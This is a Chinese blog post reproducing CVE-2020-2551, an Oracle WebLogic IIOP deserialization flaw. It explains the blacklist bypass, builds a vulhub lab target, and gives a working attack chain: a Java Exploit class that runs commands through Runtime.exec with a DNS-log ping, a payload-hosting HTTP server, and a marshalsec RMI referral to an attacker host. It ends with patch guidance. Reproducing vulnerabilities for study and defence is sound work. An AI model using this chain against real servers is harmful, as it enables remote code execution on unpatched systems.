首页 > 其他分享 >漏洞复现报告:CVE-2020-2551 IIOP反序列化漏洞

漏洞复现报告:CVE-2020-2551 IIOP反序列化漏洞

时间:2023-08-14 18:03:45浏览次数:45  
标签:2551 JtaTransactionManager Java jar 漏洞 Exploit java 序列化

1.漏洞描述:

  2020年1月15日,Oracle发布了一系列的安全补丁,其中Oracle WebLogic Server产品有高危漏洞,漏洞编号CVE-2020-2551,CVSS评分9.8分,漏洞利用难度低,可基于IIOP协议执行远程代码。

Weblogic是一个服务器,可以做web服务器也可以做应用服务器

漏洞复现报告:CVE-2020-2551 IIOP反序列化漏洞_漏洞复现

WebLogic是美国Oracle公司出品的一个Application Server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。

      经过分析这次漏洞主要原因是错误的过滤JtaTransactionManager类,JtaTransactionManager父类AbstractPlatformTransactionManager在之前的补丁里面就加入到黑名单列表了,T3协议使用的是resolveClass方法去过滤的,resolveClass方法是会读取父类的,所以T3协议这样过滤是没问题的。但是IIOP协议这块,虽然也是使用的这个黑名单列表,但不是使用resolveClass方法去判断的,这样默认只会判断本类的类名,而JtaTransactionManager类是不在黑名单列表里面的,它的父类才在黑名单列表里面,这样就可以反序列化JtaTransactionManager类了,而JtaTransactionManager类是存在jndi注入的。

漏洞复现报告:CVE-2020-2551 IIOP反序列化漏洞_网络安全_02

2.靶机环境搭建

  1. 这里搭建Weblogic 10.3.6.0.0的环境,直接使用vulhub中的CVE-2017-10271就可以
  2. 进入到目录,执行docker-compose up -d

漏洞复现报告:CVE-2020-2551 IIOP反序列化漏洞_漏洞复现_03

漏洞复现报告:CVE-2020-2551 IIOP反序列化漏洞_漏洞复现_04


安装所需的jar所需jar包: https://drive.google.com/file/d/1ssc_8kkjLnzVMTO7G2aswIMLxSLD1Ali/view?usp=sharing

#编译 /Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/javac -cp /Users/caiqiqi/.m2/repository/org/springframework/spring-tx/4.3.16.RELEASE/spring-tx-4.3.16.RELEASE.jar:/Users/caiqiqi/Downloads/ysoserial-0.0.6-SNAPSHOT-BETA-all.jar:. com/cqq/WeblogicCVE_2020_2551.java #执行 /Library/Java/JavaVirtualMachines/jdk1.7.0_79.jdk/Contents/Home/bin/java -cp /Users

3 复现漏洞

开启监听服务

python3 -m http.server 80

下放Exploit.java编译后的Exploit.class文件

public class Exploit{ public Exploit(){ try{ java.lang.Runtime.getRuntime().exec("ping weblogic.f9daa4b2c9be9ad66693.d.zhack.ca"); } catch(java.io.IOException e){ e.printStackTrace(); } } }


然后使用marshalsec创建一个RMI服务:

java -cp /Users/caiqiqi/GitProjects/marshalsec/target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.170.1/#Exploit" 1099

漏洞复现报告:CVE-2020-2551 IIOP反序列化漏洞_漏洞复现_05

编译成功


4.漏洞修复

漏洞修复

安装官方补丁更新: https://www.oracle.com/security-alerts/cpujan2020.html

标签:2551,JtaTransactionManager,Java,jar,漏洞,Exploit,java,序列化
From: https://blog.51cto.com/u_15854462/7079522

相关文章

  • 序列化 - Kryo序列化详解
    什么是序列化序列化是指将数据结构或对象转换为可存储或传输的格式,以便在稍后的时间点重新构建或恢复原始数据结构或对象的过程。在计算机科学和编程中,序列化通常用于将内存中的数据转换为可以在磁盘上保存或通过网络传输的形式,以便在需要时进行持久化存储或在不同系统之间进行数......
  • 序列化 - jdk序列化详解
    当谈到在Java中将对象转换为字节流以便于存储、传输或持久化时,不可避免地会涉及到JDK序列化。JDK序列化是Java编程语言提供的一种机制,允许开发者将对象转换为字节序列,以便在稍后的时间点能够重新构建或恢复对象的状态。本文将深入介绍JDK序列化的概念、用法以及一些相关的......
  • Nexpose v6.6.210 for Linux & Windows - 漏洞扫描
    Nexposev6.6.210forLinux&Windows-漏洞扫描Rapid7VulnerabilityManagement,ReleaseAug09,2023请访问原文链接:https://sysin.org/blog/nexpose-6/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org您的本地漏洞扫描程序搜集通过实时覆盖整个网络,随......
  • 数据序列化工具Protobuf编码&避坑指南
    我们现在所有的协议、配置、数据库的表达都是以protobuf来进行承载的,所以我想深入总结一下protobuf这个协议,以免踩坑。先简单介绍一下ProtocolBuffers(protobuf),它是Google开发的一种数据序列化协议(与XML、JSON类似)。它具有很多优点,但也有一些需要注意的缺点:优点:效......
  • Web通用漏洞--RCE
    Web通用漏洞--RCE漏洞简介RCE远程代码/命令执行漏洞,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统。RCE漏洞也分为代码执行漏洞和命令执行漏洞,所谓代码执行即通过漏洞点注入参数而使用源代码进行相应的操作,所谓的命令执行就是通过漏洞点注入参数......
  • Web通用漏洞--文件上传
    Web通用漏洞--文件上传概述文件上传安全指的是攻击者通过利用上传实现后门的写入连接后门进行权限控制的安全问题,对于如何确保这类安全问题,一般会从原生态功能中的文件内容,文件后缀,文件类型等方面判断,但是漏洞可能不仅在本身的代码验证逻辑中出现安全问题,也会在语言版本,语言函数......
  • Web通用漏洞--文件包含
    Web通用漏洞--文件包含文件包含原理在项目开发过程中,开发人员通常会将重复使用的函数写入单个文件中,在使用该类函数时,直接调用文件即可,无需重新编写,这种调用文件的过程成为文件包含。在文件包含过程中,如果用户可以控制所包含的文件,则为文件包含漏洞。文件包含函数PHP:include、......
  • 漏洞发现-API接口之漏洞探针利用修复
    测试思路信息收集之信息利用第一步:首先识别网站是否有cdn,waf等产品,有则绕过。第二步:扫描收集到网站的端口信息,真实ip地址,ip绑定的其他域名。第三步:网站敏感路径扫描第四步:域名+端口敏感信息扫描第五步:ip+端口敏感目录扫描备注:字典不应该只是敏感路径,还应该有备份文件ziprart......
  • 致远OA任意文件上传漏洞
    漏洞编号无影响产品致远OAV8.0致远OAV7.1、V7.1SP1致远OAV7.0、V7.0SP1、V7.0SP2、V7.0SP3利用状态在野利用(已公开poc)漏洞详情路径(需要普通用户权限)POST/seeyon/aiax.do?method=aiaxAction&managerName=cipSynSchemeManager&requestCompress=gzipHTTP/1.1Host:1......
  • 40% Ubuntu 用户面临着新特权提升漏洞风险
    导读Wiz的研究人员发现,最近被引入Ubuntu内核的两个 Linux 漏洞,可能会在大量设备上为非特权本地用户提升权限。这两个漏洞被追踪为CVE-2023-32629和CVE-2023-2640,预计影响了大约40%的Ubuntu用户。根据介绍,其中CVE-2023-2640是UbuntuLinux内核中的一个高严......